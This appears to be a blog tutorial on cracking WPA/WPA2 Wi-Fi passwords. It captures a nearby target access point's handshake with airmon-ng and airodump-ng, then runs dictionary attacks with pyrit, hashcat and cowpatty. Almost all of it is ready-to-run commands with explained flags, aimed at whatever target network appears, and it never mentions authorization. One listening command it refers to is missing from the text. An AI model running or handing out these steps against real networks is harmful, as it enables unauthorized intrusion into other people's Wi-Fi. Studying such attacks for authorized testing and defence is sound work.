First start the monitor mode on our wireless adaptor .
airmon-ng start wlan0
Now the monitor mode is enabled with name wlan0mon.
and then with the following command start listening to all the available wifi connections:
After running the above command it will start listening all the wifi traffic nearby so wait till your target appears and then hit ctrl^c.
Now we have to listen to a specific channel on which the target is present . Now run command:
airodump-ng -c 2 –bssid 3C:1E:04:XX:XX:XX –write sommay wlan0mon
-c == channel number of the target (2 in my case , see the CH column)
–bssid == MAC address of the target AP
–write == name of the capture file
Now wait till the WPA handshake is captured and then hit crtl^c.
Now a file named sommay-01.cap will be generated
First method to crack the password from the capture file is PYRIT . We will use dictionary-attack so run command:
pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough
-i == path to the input file in our case it is the path to dictionary
-r == path to the captured fle which ( in our case it is sommay-01.cap)
attack_passthrough == this options is to specify that a dictionary attack is to be performed
As you can see it has successfully cracked the password.
First of all download oclhashcat from its official website: //hashcat.net/files/hashcat-2.00.7z
First we have to convert the .cap file we captured with airodump-ng previously to .hccap with aircrack-ng by command:
aircrack-ng sommay-01.cap -J sommay-01
-J == the path to the output file with extension .hccap
Now copy the dictionary you want to use in the Hashcat folder. Now enter in the hashcat folder and run command:
./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst
In above command if you are using 32 bit system replace 64 with 32.
-m is the hash type which is 2500 for WPA/WPA2 cracking
then give the path to .hccap file which you converted with aircrack-ng. and then the name of the dictionary file. As you can see it has successfully cracked the password.
For cracking with the help of cowpatty we have to first generate the hash file specific to the target AP. For this we will use genpmk so run command:
genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY
-f == path to the dictionary file
-d == name of the output dictionary
-s == ESSID(Name) of the target AP(The name should be identical to the target AP)
Now it will generate a dictionary file named cowpatty_dict which will speed up the cracking process.
Now run command :
cowpatty -d cowpatty_dict -r sommay-01.cap -s SOMMAY
-d == path to dictionary we generated with genpmk
-r == path to the capture file we generated with airodump-ng
-s == ESSID of the target AP(The name should be identical to the target AP)
Author: Himanshu Gupta is a Information Security Researcher | Technical writer. You can follow him on LinkedIn .